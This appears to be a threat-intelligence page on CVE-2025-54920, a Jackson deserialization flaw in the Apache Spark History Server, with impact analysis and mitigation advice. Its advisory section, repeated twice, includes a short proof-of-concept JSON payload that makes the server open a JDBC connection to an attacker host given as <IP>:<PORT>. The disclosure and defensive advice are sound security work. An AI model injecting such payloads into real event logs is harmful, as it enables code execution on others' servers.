CVE-2025-54920: CWE-502 Deserialization of Untrusted Data in Apache Software Foundation Apache Spark
This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue. Summary Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server. Details The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization. The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability. Proof of Concept: 1. Run Spark with event logging enabled, writing to a writable directory (spark-logs). 2. Inject the following JSON at the beginning of an event log file: { "Event": "org.apache.hive.jdbc.HiveConnection", "uri": "jdbc:hive2://<IP>:<PORT>/", "info": { "hive.metastore.uris": "thrift://<IP>:<PORT>" } } 3. Start the Spark History Server with logs pointing to the modified directory. 4. The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection. Impact An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.
AI Analysis
Technical Summary
CVE-2025-54920 is a critical deserialization vulnerability found in Apache Spark versions prior to 3.5.7 and 4.0.1, specifically impacting the Spark History Server component. The root cause is the use of Jackson's polymorphic deserialization feature with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, which allows untrusted JSON input to specify arbitrary Java class names for deserialization. This behavior enables an attacker who can write to the Spark event logs directory to craft malicious JSON payloads that instantiate unintended classes during deserialization. For example, an attacker can inject a JSON payload that causes the History Server to instantiate org.apache.hive.jdbc.HiveConnection, which triggers a JDBC connection to an attacker-controlled server. This results in remote code execution on the host running the History Server. The vulnerability is exploitable when the History Server loads or restarts and processes the manipulated event logs. The attack requires write access to the event logs directory but does not require authentication or user interaction. The vulnerability stems from insecure handling of polymorphic deserialization, a known risky practice when deserializing untrusted data. Apache Spark versions 3.5.7 and 4.0.1 include patches that restrict or sanitize deserialization inputs to prevent this attack vector. No known exploits are currently reported in the wild, but the vulnerability is publicly disclosed and should be considered high risk due to its potential impact and ease of exploitation given write access.
Potential Impact
The impact of CVE-2025-54920 is severe for organizations using Apache Spark with event logging enabled and accessible log directories. An attacker with write permissions to the Spark event logs can execute arbitrary code on the server hosting the Spark History Server, potentially leading to full system compromise. This could result in unauthorized data access, data manipulation, lateral movement within the network, and disruption of analytics workflows. Since the History Server often runs with elevated privileges or access to sensitive data, the compromise could extend to critical infrastructure components. The vulnerability undermines the integrity and availability of Spark analytics environments and can be leveraged as a foothold for further attacks. Organizations relying on Spark for big data processing, especially in multi-tenant or cloud environments where log directories might be shared or insufficiently protected, face significant risk. The absence of authentication requirements for exploitation increases the threat level if attackers gain write access to logs through other means such as misconfigurations or insider threats.
Mitigation Recommendations
To mitigate CVE-2025-54920, organizations should immediately upgrade Apache Spark to versions 3.5.7 or 4.0.1 and above, where the deserialization flaw is fixed. Beyond upgrading, it is critical to enforce strict access controls on the Spark event logs directory to prevent unauthorized write access. Implement file system permissions and network segmentation to isolate the History Server and its logs from untrusted users or processes. Consider disabling or restricting event logging if not required, or redirect logs to secure, immutable storage. Employ runtime application self-protection (RASP) or monitoring tools to detect anomalous deserialization behavior or unexpected outbound JDBC connections from the History Server. Review and harden Jackson deserialization configurations to avoid polymorphic deserialization of untrusted data. Conduct regular audits of Spark deployment configurations and logs to detect suspicious modifications. Finally, incorporate this vulnerability into incident response plans and threat hunting activities to quickly identify exploitation attempts.
Affected Countries
United States, Germany, India, China, United Kingdom, France, Canada, Australia, Japan, South Korea
CVE-2025-54920: CWE-502 Deserialization of Untrusted Data in Apache Software Foundation Apache Spark
Description
This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue. Summary Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server. Details The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization. The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability. Proof of Concept: 1. Run Spark with event logging enabled, writing to a writable directory (spark-logs). 2. Inject the following JSON at the beginning of an event log file: { "Event": "org.apache.hive.jdbc.HiveConnection", "uri": "jdbc:hive2://<IP>:<PORT>/", "info": { "hive.metastore.uris": "thrift://<IP>:<PORT>" } } 3. Start the Spark History Server with logs pointing to the modified directory. 4. The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection. Impact An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.
AI-Powered Analysis
Technical Analysis
CVE-2025-54920 is a critical deserialization vulnerability found in Apache Spark versions prior to 3.5.7 and 4.0.1, specifically impacting the Spark History Server component. The root cause is the use of Jackson's polymorphic deserialization feature with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, which allows untrusted JSON input to specify arbitrary Java class names for deserialization. This behavior enables an attacker who can write to the Spark event logs directory to craft malicious JSON payloads that instantiate unintended classes during deserialization. For example, an attacker can inject a JSON payload that causes the History Server to instantiate org.apache.hive.jdbc.HiveConnection, which triggers a JDBC connection to an attacker-controlled server. This results in remote code execution on the host running the History Server. The vulnerability is exploitable when the History Server loads or restarts and processes the manipulated event logs. The attack requires write access to the event logs directory but does not require authentication or user interaction. The vulnerability stems from insecure handling of polymorphic deserialization, a known risky practice when deserializing untrusted data. Apache Spark versions 3.5.7 and 4.0.1 include patches that restrict or sanitize deserialization inputs to prevent this attack vector. No known exploits are currently reported in the wild, but the vulnerability is publicly disclosed and should be considered high risk due to its potential impact and ease of exploitation given write access.
Potential Impact
The impact of CVE-2025-54920 is severe for organizations using Apache Spark with event logging enabled and accessible log directories. An attacker with write permissions to the Spark event logs can execute arbitrary code on the server hosting the Spark History Server, potentially leading to full system compromise. This could result in unauthorized data access, data manipulation, lateral movement within the network, and disruption of analytics workflows. Since the History Server often runs with elevated privileges or access to sensitive data, the compromise could extend to critical infrastructure components. The vulnerability undermines the integrity and availability of Spark analytics environments and can be leveraged as a foothold for further attacks. Organizations relying on Spark for big data processing, especially in multi-tenant or cloud environments where log directories might be shared or insufficiently protected, face significant risk. The absence of authentication requirements for exploitation increases the threat level if attackers gain write access to logs through other means such as misconfigurations or insider threats.
Mitigation Recommendations
To mitigate CVE-2025-54920, organizations should immediately upgrade Apache Spark to versions 3.5.7 or 4.0.1 and above, where the deserialization flaw is fixed. Beyond upgrading, it is critical to enforce strict access controls on the Spark event logs directory to prevent unauthorized write access. Implement file system permissions and network segmentation to isolate the History Server and its logs from untrusted users or processes. Consider disabling or restricting event logging if not required, or redirect logs to secure, immutable storage. Employ runtime application self-protection (RASP) or monitoring tools to detect anomalous deserialization behavior or unexpected outbound JDBC connections from the History Server. Review and harden Jackson deserialization configurations to avoid polymorphic deserialization of untrusted data. Conduct regular audits of Spark deployment configurations and logs to detect suspicious modifications. Finally, incorporate this vulnerability into incident response plans and threat hunting activities to quickly identify exploitation attempts.
Technical Details
- Data Version
- 5.2
- Assigner Short Name
- apache
- Date Reserved
- 2025-08-01T01:09:45.224Z
- Cvss Version
- null
- State
- PUBLISHED
Threat ID: 69b527072f860ef943974709
Added to database: 3/14/2026, 9:14:47 AM
Last enriched: 3/14/2026, 9:29:06 AM
Last updated: 3/15/2026, 8:46:17 PM
Views: 23
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
Need more coverage?
Upgrade to Pro Console in Console -> Billing for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.